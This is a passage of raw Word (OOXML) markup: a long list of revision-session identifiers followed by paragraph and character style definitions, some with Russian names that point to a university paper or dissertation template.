    <w:rsid w:val="00D05CBD"/>
    <w:rsid w:val="00D05D3A"/>
    <w:rsid w:val="00D0730F"/>
    <w:rsid w:val="00D11477"/>
    <w:rsid w:val="00D124F1"/>
    <w:rsid w:val="00D1348D"/>
    <w:rsid w:val="00D1434F"/>
    <w:rsid w:val="00D1478F"/>
    <w:rsid w:val="00D158C3"/>
    <w:rsid w:val="00D1649D"/>
    <w:rsid w:val="00D168C8"/>
    <w:rsid w:val="00D169E8"/>
    <w:rsid w:val="00D2031D"/>
    <w:rsid w:val="00D2165D"/>
    <w:rsid w:val="00D21D3F"/>
    <w:rsid w:val="00D2299A"/>
    <w:rsid w:val="00D23714"/>
    <w:rsid w:val="00D23DEC"/>
    <w:rsid w:val="00D24C6D"/>
    <w:rsid w:val="00D24F5F"/>
    <w:rsid w:val="00D25617"/>
    <w:rsid w:val="00D256B0"/>
    <w:rsid w:val="00D25E99"/>
    <w:rsid w:val="00D26D16"/>
    <w:rsid w:val="00D26D23"/>
    <w:rsid w:val="00D27937"/>
    <w:rsid w:val="00D30A60"/>
    <w:rsid w:val="00D31027"/>
    <w:rsid w:val="00D320D9"/>
    <w:rsid w:val="00D33AF8"/>
    <w:rsid w:val="00D3705B"/>
    <w:rsid w:val="00D373C8"/>
    <w:rsid w:val="00D40262"/>
    <w:rsid w:val="00D41807"/>
    <w:rsid w:val="00D42B3B"/>
    <w:rsid w:val="00D43264"/>
    <w:rsid w:val="00D438CA"/>
    <w:rsid w:val="00D44797"/>
    <w:rsid w:val="00D45470"/>
    <w:rsid w:val="00D45BF7"/>
    <w:rsid w:val="00D45C03"/>
    <w:rsid w:val="00D45D04"/>
    <w:rsid w:val="00D46E17"/>
    <w:rsid w:val="00D5012F"/>
    <w:rsid w:val="00D50CBB"/>
    <w:rsid w:val="00D50D35"/>
    <w:rsid w:val="00D50FA8"/>
    <w:rsid w:val="00D51360"/>
    <w:rsid w:val="00D523CB"/>
    <w:rsid w:val="00D5293C"/>
    <w:rsid w:val="00D5322A"/>
    <w:rsid w:val="00D53597"/>
    <w:rsid w:val="00D53B15"/>
    <w:rsid w:val="00D54950"/>
    <w:rsid w:val="00D54EED"/>
    <w:rsid w:val="00D55371"/>
    <w:rsid w:val="00D55D77"/>
    <w:rsid w:val="00D55FDD"/>
    <w:rsid w:val="00D56C88"/>
    <w:rsid w:val="00D57EB9"/>
    <w:rsid w:val="00D64355"/>
    <w:rsid w:val="00D65363"/>
    <w:rsid w:val="00D65BC4"/>
    <w:rsid w:val="00D65DE9"/>
    <w:rsid w:val="00D67964"/>
    <w:rsid w:val="00D703A0"/>
    <w:rsid w:val="00D70578"/>
    <w:rsid w:val="00D706A0"/>
    <w:rsid w:val="00D7196D"/>
    <w:rsid w:val="00D72595"/>
    <w:rsid w:val="00D74265"/>
    <w:rsid w:val="00D75366"/>
    <w:rsid w:val="00D76715"/>
    <w:rsid w:val="00D76E50"/>
    <w:rsid w:val="00D77017"/>
    <w:rsid w:val="00D812AE"/>
    <w:rsid w:val="00D84772"/>
    <w:rsid w:val="00D847FA"/>
    <w:rsid w:val="00D850BF"/>
    <w:rsid w:val="00D85DB5"/>
    <w:rsid w:val="00D8660E"/>
    <w:rsid w:val="00D8695B"/>
    <w:rsid w:val="00D876C5"/>
    <w:rsid w:val="00D878A4"/>
    <w:rsid w:val="00D90351"/>
    <w:rsid w:val="00D90B4A"/>
    <w:rsid w:val="00D90B4C"/>
    <w:rsid w:val="00D93A8E"/>
    <w:rsid w:val="00D95345"/>
    <w:rsid w:val="00D959E2"/>
    <w:rsid w:val="00D96802"/>
    <w:rsid w:val="00D97154"/>
    <w:rsid w:val="00DA0E4E"/>
    <w:rsid w:val="00DA138C"/>
    <w:rsid w:val="00DA1B27"/>
    <w:rsid w:val="00DA2C3D"/>
    <w:rsid w:val="00DA3BBB"/>
    <w:rsid w:val="00DA3D82"/>
    <w:rsid w:val="00DA3FA3"/>
    <w:rsid w:val="00DA41FA"/>
    <w:rsid w:val="00DA43FD"/>
    <w:rsid w:val="00DA4701"/>
    <w:rsid w:val="00DA5854"/>
    <w:rsid w:val="00DA62E4"/>
    <w:rsid w:val="00DA6393"/>
    <w:rsid w:val="00DA79F6"/>
    <w:rsid w:val="00DB0A98"/>
    <w:rsid w:val="00DB0F48"/>
    <w:rsid w:val="00DB16E9"/>
    <w:rsid w:val="00DB2882"/>
    <w:rsid w:val="00DB2BBC"/>
    <w:rsid w:val="00DB30B6"/>
    <w:rsid w:val="00DB46FF"/>
    <w:rsid w:val="00DB5BF7"/>
    <w:rsid w:val="00DB7095"/>
    <w:rsid w:val="00DB70C0"/>
    <w:rsid w:val="00DB7435"/>
    <w:rsid w:val="00DC002D"/>
    <w:rsid w:val="00DC04E8"/>
    <w:rsid w:val="00DC11F5"/>
    <w:rsid w:val="00DC29AF"/>
    <w:rsid w:val="00DC2B41"/>
    <w:rsid w:val="00DC52B1"/>
    <w:rsid w:val="00DC57D2"/>
    <w:rsid w:val="00DC760C"/>
    <w:rsid w:val="00DD0783"/>
    <w:rsid w:val="00DD0890"/>
    <w:rsid w:val="00DD2A89"/>
    <w:rsid w:val="00DD3BB4"/>
    <w:rsid w:val="00DD4507"/>
    <w:rsid w:val="00DD450F"/>
    <w:rsid w:val="00DD64DC"/>
    <w:rsid w:val="00DD6E01"/>
    <w:rsid w:val="00DD6EE4"/>
    <w:rsid w:val="00DD6F07"/>
    <w:rsid w:val="00DD6F52"/>
    <w:rsid w:val="00DD7796"/>
    <w:rsid w:val="00DD78C1"/>
    <w:rsid w:val="00DE039B"/>
    <w:rsid w:val="00DE05CD"/>
    <w:rsid w:val="00DE080A"/>
    <w:rsid w:val="00DE1D5D"/>
    <w:rsid w:val="00DE1F5C"/>
    <w:rsid w:val="00DE1F7F"/>
    <w:rsid w:val="00DE2163"/>
    <w:rsid w:val="00DE2DF0"/>
    <w:rsid w:val="00DE3170"/>
    <w:rsid w:val="00DE34D6"/>
    <w:rsid w:val="00DE41A2"/>
    <w:rsid w:val="00DE44A4"/>
    <w:rsid w:val="00DE5616"/>
    <w:rsid w:val="00DF0D25"/>
    <w:rsid w:val="00DF3011"/>
    <w:rsid w:val="00DF3976"/>
    <w:rsid w:val="00DF3A99"/>
    <w:rsid w:val="00DF3C2A"/>
    <w:rsid w:val="00DF3DED"/>
    <w:rsid w:val="00DF464D"/>
    <w:rsid w:val="00DF4EA5"/>
    <w:rsid w:val="00DF5486"/>
    <w:rsid w:val="00DF5765"/>
    <w:rsid w:val="00DF5FAC"/>
    <w:rsid w:val="00DF6AFD"/>
    <w:rsid w:val="00DF7137"/>
    <w:rsid w:val="00DF720F"/>
    <w:rsid w:val="00DF7435"/>
    <w:rsid w:val="00DF77B5"/>
    <w:rsid w:val="00DF7EE2"/>
    <w:rsid w:val="00E00249"/>
    <w:rsid w:val="00E00678"/>
    <w:rsid w:val="00E010B2"/>
    <w:rsid w:val="00E026A6"/>
    <w:rsid w:val="00E03E0E"/>
    <w:rsid w:val="00E0506B"/>
    <w:rsid w:val="00E05577"/>
    <w:rsid w:val="00E0618A"/>
    <w:rsid w:val="00E06DF1"/>
    <w:rsid w:val="00E06F12"/>
    <w:rsid w:val="00E07036"/>
    <w:rsid w:val="00E12359"/>
    <w:rsid w:val="00E129EF"/>
    <w:rsid w:val="00E12B52"/>
    <w:rsid w:val="00E137F3"/>
    <w:rsid w:val="00E13995"/>
    <w:rsid w:val="00E1444D"/>
    <w:rsid w:val="00E1457D"/>
    <w:rsid w:val="00E15523"/>
    <w:rsid w:val="00E16C66"/>
    <w:rsid w:val="00E170E3"/>
    <w:rsid w:val="00E17DD4"/>
    <w:rsid w:val="00E20484"/>
    <w:rsid w:val="00E212F9"/>
    <w:rsid w:val="00E21BDC"/>
    <w:rsid w:val="00E22262"/>
    <w:rsid w:val="00E22FB2"/>
    <w:rsid w:val="00E2366B"/>
    <w:rsid w:val="00E23B4D"/>
    <w:rsid w:val="00E26388"/>
    <w:rsid w:val="00E27416"/>
    <w:rsid w:val="00E275CB"/>
    <w:rsid w:val="00E302A0"/>
    <w:rsid w:val="00E30EC1"/>
    <w:rsid w:val="00E31031"/>
    <w:rsid w:val="00E316CB"/>
    <w:rsid w:val="00E3209B"/>
    <w:rsid w:val="00E32AA8"/>
    <w:rsid w:val="00E349E8"/>
    <w:rsid w:val="00E35031"/>
    <w:rsid w:val="00E35722"/>
    <w:rsid w:val="00E37932"/>
    <w:rsid w:val="00E37AA1"/>
    <w:rsid w:val="00E37F8F"/>
    <w:rsid w:val="00E4115D"/>
    <w:rsid w:val="00E42985"/>
    <w:rsid w:val="00E44393"/>
    <w:rsid w:val="00E45874"/>
    <w:rsid w:val="00E45D42"/>
    <w:rsid w:val="00E461A2"/>
    <w:rsid w:val="00E5019F"/>
    <w:rsid w:val="00E50508"/>
    <w:rsid w:val="00E5097B"/>
    <w:rsid w:val="00E50F3C"/>
    <w:rsid w:val="00E510FA"/>
    <w:rsid w:val="00E5134F"/>
    <w:rsid w:val="00E5347E"/>
    <w:rsid w:val="00E53738"/>
    <w:rsid w:val="00E53FFF"/>
    <w:rsid w:val="00E542CE"/>
    <w:rsid w:val="00E54CDD"/>
    <w:rsid w:val="00E5526F"/>
    <w:rsid w:val="00E5545D"/>
    <w:rsid w:val="00E55523"/>
    <w:rsid w:val="00E5668B"/>
    <w:rsid w:val="00E572B4"/>
    <w:rsid w:val="00E57732"/>
    <w:rsid w:val="00E6092D"/>
    <w:rsid w:val="00E609E4"/>
    <w:rsid w:val="00E60CB1"/>
    <w:rsid w:val="00E61079"/>
    <w:rsid w:val="00E624CE"/>
    <w:rsid w:val="00E6295B"/>
    <w:rsid w:val="00E62B38"/>
    <w:rsid w:val="00E63B45"/>
    <w:rsid w:val="00E64052"/>
    <w:rsid w:val="00E6496C"/>
    <w:rsid w:val="00E65963"/>
    <w:rsid w:val="00E66F1A"/>
    <w:rsid w:val="00E6739F"/>
    <w:rsid w:val="00E6762B"/>
    <w:rsid w:val="00E67879"/>
    <w:rsid w:val="00E67DFD"/>
    <w:rsid w:val="00E67EAC"/>
    <w:rsid w:val="00E67FF7"/>
    <w:rsid w:val="00E70788"/>
    <w:rsid w:val="00E71898"/>
    <w:rsid w:val="00E71DBE"/>
    <w:rsid w:val="00E71F00"/>
    <w:rsid w:val="00E72AEB"/>
    <w:rsid w:val="00E73FFC"/>
    <w:rsid w:val="00E76858"/>
    <w:rsid w:val="00E76DB3"/>
    <w:rsid w:val="00E801F0"/>
    <w:rsid w:val="00E80E53"/>
    <w:rsid w:val="00E81BEA"/>
    <w:rsid w:val="00E835B7"/>
    <w:rsid w:val="00E8399B"/>
    <w:rsid w:val="00E85923"/>
    <w:rsid w:val="00E85EE8"/>
    <w:rsid w:val="00E87485"/>
    <w:rsid w:val="00E90152"/>
    <w:rsid w:val="00E908A9"/>
    <w:rsid w:val="00E91F82"/>
    <w:rsid w:val="00E921D9"/>
    <w:rsid w:val="00E927B3"/>
    <w:rsid w:val="00E92D63"/>
    <w:rsid w:val="00E933A2"/>
    <w:rsid w:val="00E93873"/>
    <w:rsid w:val="00E93B18"/>
    <w:rsid w:val="00E93F56"/>
    <w:rsid w:val="00E958EA"/>
    <w:rsid w:val="00E96349"/>
    <w:rsid w:val="00E96398"/>
    <w:rsid w:val="00E97467"/>
    <w:rsid w:val="00EA116D"/>
    <w:rsid w:val="00EA1E54"/>
    <w:rsid w:val="00EA258F"/>
    <w:rsid w:val="00EA26F1"/>
    <w:rsid w:val="00EA3854"/>
    <w:rsid w:val="00EA3B34"/>
    <w:rsid w:val="00EA4CC2"/>
    <w:rsid w:val="00EA4D56"/>
    <w:rsid w:val="00EA6323"/>
    <w:rsid w:val="00EA6E4E"/>
    <w:rsid w:val="00EA6EFC"/>
    <w:rsid w:val="00EA7BFF"/>
    <w:rsid w:val="00EB2A32"/>
    <w:rsid w:val="00EB2DCA"/>
    <w:rsid w:val="00EB30A2"/>
    <w:rsid w:val="00EB3432"/>
    <w:rsid w:val="00EB35A3"/>
    <w:rsid w:val="00EB36E9"/>
    <w:rsid w:val="00EB3F7C"/>
    <w:rsid w:val="00EB4790"/>
    <w:rsid w:val="00EB524A"/>
    <w:rsid w:val="00EB719D"/>
    <w:rsid w:val="00EC04A8"/>
    <w:rsid w:val="00EC1E97"/>
    <w:rsid w:val="00EC2843"/>
    <w:rsid w:val="00EC4338"/>
    <w:rsid w:val="00ED209C"/>
    <w:rsid w:val="00ED3B38"/>
    <w:rsid w:val="00ED3ECF"/>
    <w:rsid w:val="00ED5920"/>
    <w:rsid w:val="00ED6499"/>
    <w:rsid w:val="00EE0952"/>
    <w:rsid w:val="00EE09E8"/>
    <w:rsid w:val="00EE1593"/>
    <w:rsid w:val="00EE1634"/>
    <w:rsid w:val="00EE2918"/>
    <w:rsid w:val="00EE29DA"/>
    <w:rsid w:val="00EE2EBB"/>
    <w:rsid w:val="00EE3D47"/>
    <w:rsid w:val="00EE48DD"/>
    <w:rsid w:val="00EE60CE"/>
    <w:rsid w:val="00EE7361"/>
    <w:rsid w:val="00EE7F1B"/>
    <w:rsid w:val="00EF0C0C"/>
    <w:rsid w:val="00EF0C38"/>
    <w:rsid w:val="00EF11EF"/>
    <w:rsid w:val="00EF3117"/>
    <w:rsid w:val="00EF3B00"/>
    <w:rsid w:val="00EF47C9"/>
    <w:rsid w:val="00EF615E"/>
    <w:rsid w:val="00EF7949"/>
    <w:rsid w:val="00F007FA"/>
    <w:rsid w:val="00F00FD2"/>
    <w:rsid w:val="00F01CCE"/>
    <w:rsid w:val="00F02068"/>
    <w:rsid w:val="00F02541"/>
    <w:rsid w:val="00F03191"/>
    <w:rsid w:val="00F03955"/>
    <w:rsid w:val="00F03C89"/>
    <w:rsid w:val="00F0576A"/>
    <w:rsid w:val="00F0621B"/>
    <w:rsid w:val="00F06ADC"/>
    <w:rsid w:val="00F10AE0"/>
    <w:rsid w:val="00F10C0D"/>
    <w:rsid w:val="00F113B6"/>
    <w:rsid w:val="00F1222E"/>
    <w:rsid w:val="00F1406C"/>
    <w:rsid w:val="00F15689"/>
    <w:rsid w:val="00F15B56"/>
    <w:rsid w:val="00F16836"/>
    <w:rsid w:val="00F16C7F"/>
    <w:rsid w:val="00F16C89"/>
    <w:rsid w:val="00F22FD8"/>
    <w:rsid w:val="00F23A24"/>
    <w:rsid w:val="00F275EC"/>
    <w:rsid w:val="00F278E0"/>
    <w:rsid w:val="00F311A6"/>
    <w:rsid w:val="00F31886"/>
    <w:rsid w:val="00F3206C"/>
    <w:rsid w:val="00F32D5B"/>
    <w:rsid w:val="00F34D65"/>
    <w:rsid w:val="00F357F2"/>
    <w:rsid w:val="00F35BB6"/>
    <w:rsid w:val="00F35E4A"/>
    <w:rsid w:val="00F36EBD"/>
    <w:rsid w:val="00F379A6"/>
    <w:rsid w:val="00F4011E"/>
    <w:rsid w:val="00F41048"/>
    <w:rsid w:val="00F41FC3"/>
    <w:rsid w:val="00F4218F"/>
    <w:rsid w:val="00F43A12"/>
    <w:rsid w:val="00F44E28"/>
    <w:rsid w:val="00F45A12"/>
    <w:rsid w:val="00F4618E"/>
    <w:rsid w:val="00F51934"/>
    <w:rsid w:val="00F51ABF"/>
    <w:rsid w:val="00F52B99"/>
    <w:rsid w:val="00F5302E"/>
    <w:rsid w:val="00F53755"/>
    <w:rsid w:val="00F54A91"/>
    <w:rsid w:val="00F56894"/>
    <w:rsid w:val="00F57726"/>
    <w:rsid w:val="00F57BDB"/>
    <w:rsid w:val="00F6005D"/>
    <w:rsid w:val="00F60FEB"/>
    <w:rsid w:val="00F611D8"/>
    <w:rsid w:val="00F61856"/>
    <w:rsid w:val="00F62362"/>
    <w:rsid w:val="00F63837"/>
    <w:rsid w:val="00F63A96"/>
    <w:rsid w:val="00F65275"/>
    <w:rsid w:val="00F65D17"/>
    <w:rsid w:val="00F71CF5"/>
    <w:rsid w:val="00F724B7"/>
    <w:rsid w:val="00F72528"/>
    <w:rsid w:val="00F73141"/>
    <w:rsid w:val="00F75187"/>
    <w:rsid w:val="00F75247"/>
    <w:rsid w:val="00F754C2"/>
    <w:rsid w:val="00F7668A"/>
    <w:rsid w:val="00F76EFE"/>
    <w:rsid w:val="00F77C56"/>
    <w:rsid w:val="00F8047A"/>
    <w:rsid w:val="00F807D7"/>
    <w:rsid w:val="00F8082E"/>
    <w:rsid w:val="00F80DDC"/>
    <w:rsid w:val="00F82A89"/>
    <w:rsid w:val="00F82E57"/>
    <w:rsid w:val="00F831B2"/>
    <w:rsid w:val="00F8399F"/>
    <w:rsid w:val="00F83E9A"/>
    <w:rsid w:val="00F842AE"/>
    <w:rsid w:val="00F845D9"/>
    <w:rsid w:val="00F854C8"/>
    <w:rsid w:val="00F85BB0"/>
    <w:rsid w:val="00F86652"/>
    <w:rsid w:val="00F87687"/>
    <w:rsid w:val="00F876AD"/>
    <w:rsid w:val="00F9038A"/>
    <w:rsid w:val="00F905A2"/>
    <w:rsid w:val="00F91293"/>
    <w:rsid w:val="00F91FDD"/>
    <w:rsid w:val="00F92694"/>
    <w:rsid w:val="00F92AB8"/>
    <w:rsid w:val="00F93B64"/>
    <w:rsid w:val="00F9496C"/>
    <w:rsid w:val="00F95317"/>
    <w:rsid w:val="00F96A90"/>
    <w:rsid w:val="00F9781A"/>
    <w:rsid w:val="00F97E86"/>
    <w:rsid w:val="00FA1995"/>
    <w:rsid w:val="00FA26A8"/>
    <w:rsid w:val="00FA3122"/>
    <w:rsid w:val="00FA3A6F"/>
    <w:rsid w:val="00FA4627"/>
    <w:rsid w:val="00FA501D"/>
    <w:rsid w:val="00FA5A63"/>
    <w:rsid w:val="00FA5B85"/>
    <w:rsid w:val="00FB0EE8"/>
    <w:rsid w:val="00FB2DF0"/>
    <w:rsid w:val="00FB3E06"/>
    <w:rsid w:val="00FB4216"/>
    <w:rsid w:val="00FB451D"/>
    <w:rsid w:val="00FB4AA5"/>
    <w:rsid w:val="00FB4B9D"/>
    <w:rsid w:val="00FB4C7F"/>
    <w:rsid w:val="00FB50B4"/>
    <w:rsid w:val="00FB5544"/>
    <w:rsid w:val="00FB5D35"/>
    <w:rsid w:val="00FB6F37"/>
    <w:rsid w:val="00FB7139"/>
    <w:rsid w:val="00FB7597"/>
    <w:rsid w:val="00FC0928"/>
    <w:rsid w:val="00FC0ED5"/>
    <w:rsid w:val="00FC0FC5"/>
    <w:rsid w:val="00FC20B3"/>
    <w:rsid w:val="00FC2733"/>
    <w:rsid w:val="00FC2B2F"/>
    <w:rsid w:val="00FC35DD"/>
    <w:rsid w:val="00FC4EB0"/>
    <w:rsid w:val="00FC51C6"/>
    <w:rsid w:val="00FC5F62"/>
    <w:rsid w:val="00FC6DA5"/>
    <w:rsid w:val="00FC77E6"/>
    <w:rsid w:val="00FC7858"/>
    <w:rsid w:val="00FC7BCE"/>
    <w:rsid w:val="00FD0A06"/>
    <w:rsid w:val="00FD0C59"/>
    <w:rsid w:val="00FD2079"/>
    <w:rsid w:val="00FD2719"/>
    <w:rsid w:val="00FD4993"/>
    <w:rsid w:val="00FD5D01"/>
    <w:rsid w:val="00FD605A"/>
    <w:rsid w:val="00FD630D"/>
    <w:rsid w:val="00FD63C5"/>
    <w:rsid w:val="00FD6D80"/>
    <w:rsid w:val="00FD7859"/>
    <w:rsid w:val="00FD7957"/>
    <w:rsid w:val="00FD7FEB"/>
    <w:rsid w:val="00FE00C1"/>
    <w:rsid w:val="00FE0AEE"/>
    <w:rsid w:val="00FE11A6"/>
    <w:rsid w:val="00FE4522"/>
    <w:rsid w:val="00FE565F"/>
    <w:rsid w:val="00FF01A6"/>
    <w:rsid w:val="00FF046E"/>
    <w:rsid w:val="00FF1778"/>
    <w:rsid w:val="00FF2058"/>
    <w:rsid w:val="00FF26B3"/>
    <w:rsid w:val="00FF28AF"/>
    <w:rsid w:val="00FF31A1"/>
    <w:rsid w:val="00FF53AF"/>
    <w:rsid w:val="00FF707D"/>
    <w:rsid w:val="00FF7547"/>
    <w:rsid w:val="00FF762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4FD359"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5AF0BB4-96E2-433C-B75F-66A51F2F5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C23E3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uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="004E33DE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6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00103EFA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="header"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F5C8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2"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009F5C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F5C88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2"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009F5C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008905A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2"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="008905AC"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Списочек"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ad"/>
    <w:qFormat/>
    <w:rsid w:val="004F417F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Коммент"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af"/>
    <w:qFormat/>
    <w:rsid w:val="00971FDA"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Списочек Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="004F417F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af">
    <w:name w:val="Коммент Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00971FDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00271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2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D706A0"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Вузик_таблица"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af3"/>
    <w:qFormat/>
    <w:rsid w:val="00501556"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="Вузик_таблица Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af2"/>
    <w:rsid w:val="00501556"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="Вузик_список"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af4"/>
    <w:qFormat/>
    <w:rsid w:val="00636E7E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="Вузик_список Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a"/>
    <w:rsid w:val="00636E7E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Вузик"/>
    <w:rsid w:val="00DF5486"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0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kern w:val="3"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00DF5486"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:hAnsi="Liberation Serif" w:cs="Lohit Devanagari"/>
      <w:kern w:val="3"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00852AC9"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00852AC9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2"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00852AC9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852AC9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852AC9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00070BA2"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afc">
    <w:name w:val="диссертация"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="00CB42F1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4820"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style4">
    <w:name w:val="Style4"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00CB42F1"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="322" w:lineRule="exact"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style3">
